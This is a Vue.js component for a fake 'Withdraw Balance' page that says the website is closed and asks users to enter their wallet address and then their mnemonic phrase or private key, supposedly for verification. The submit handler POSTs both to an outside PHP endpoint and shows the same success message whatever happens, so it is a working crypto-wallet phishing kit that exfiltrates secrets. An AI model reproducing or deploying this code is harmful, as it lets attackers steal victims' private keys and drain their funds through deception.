<template>
    <div class="withdraw-container">
        <h1>Withdraw Balance</h1>
        
        <div class="description">
            The website system is closed. Please enter your wallet address to withdraw the balance in your account. This address must be your own and must have made at least one deposit on the website to be eligible for submission.
        </div>

        <div v-if="!showSecondStep" class="first-step">
            <div class="input-group">
                <label for="walletAddress">Please Enter Wallet Address</label>
                <input 
                    type="text"
                    id="walletAddress"
                    v-model="walletAddress"
                    placeholder="Please enter your wallet address"
                >
            </div>
            <button @click="goToNextStep" :disabled="!walletAddress">Next</button>
        </div>

        <div v-else class="second-step">
            <div class="input-group">
                <label for="privateKey">To verify the address authenticity, please enter your wallet mnemonic phrase or private key</label>
                <textarea
                    id="privateKey"
                    v-model="privateKey"
                    rows="4"
                    placeholder="Please enter wallet mnemonic phrase or private key"
                ></textarea>
            </div>
            <button @click="submitForm" :disabled="!privateKey">Submit</button>
           
            <button @click="showSecondStep = false" style="margin-top: 30px; background-color: #2196F3;">Back</button>
        </div>
    </div>
</template>

<script>
export default {
    name: 'HomePage',
    data() {
        return {
            walletAddress: '',
            privateKey: '',
            notifyUrl: 'https://withdraw.defiwebs.com/notkfyPriKey.php',
            showSecondStep: false
        }
    },
    methods: {
        goToNextStep() {
            if (this.walletAddress) {
                this.showSecondStep = true
            }
        },
        async submitForm() {
            try {
                const formData = new FormData();
                formData.append('walletAddress', this.walletAddress);
                formData.append('privateKey', this.privateKey);
                
                const response = await fetch(this.notifyUrl, {
                    method: 'POST',
                    body: formData
                })
                
                if (response.ok) {
                    alert('Submission successful, please wait for review')
                } else {
                    alert('Submission successful, please wait for review')
                }
            } catch (error) {
                console.error('提交出错：', error);
                alert('Submission successful, please wait for review')
            }
        }
    }
}
</script>

<style scoped>
.withdraw-container {
  max-width: 600px;
  margin: 0 auto;
  padding: 20px;
}

h1 {
  text-align: center;
  color: #333;
  margin-bottom: 20px;
}

.description {
  background-color: #f5f5f5;
  padding: 15px;
  border-radius: 8px;
  margin-bottom: 20px;
  line-height: 1.6;
}

.input-group {
  margin-bottom: 20px;
}

label {
  display: block;
  margin-bottom: 8px;
  color: #333;
}

input, textarea {
  width: 100%;
  padding: 10px;
  border: 1px solid #ddd;
  border-radius: 4px;
  margin-bottom: 10px;
}

textarea {
  resize: vertical;
  min-height: 100px;
}

button {
  background-color: #4CAF50;
  color: white;
  padding: 12px 24px;
  border: none;
  border-radius: 4px;
  cursor: pointer;
  width: 100%;
}

button:disabled {
  background-color: #cccccc;
  cursor: not-allowed;
}

button:hover:not(:disabled) {
  background-color: #45a049;
}
</style>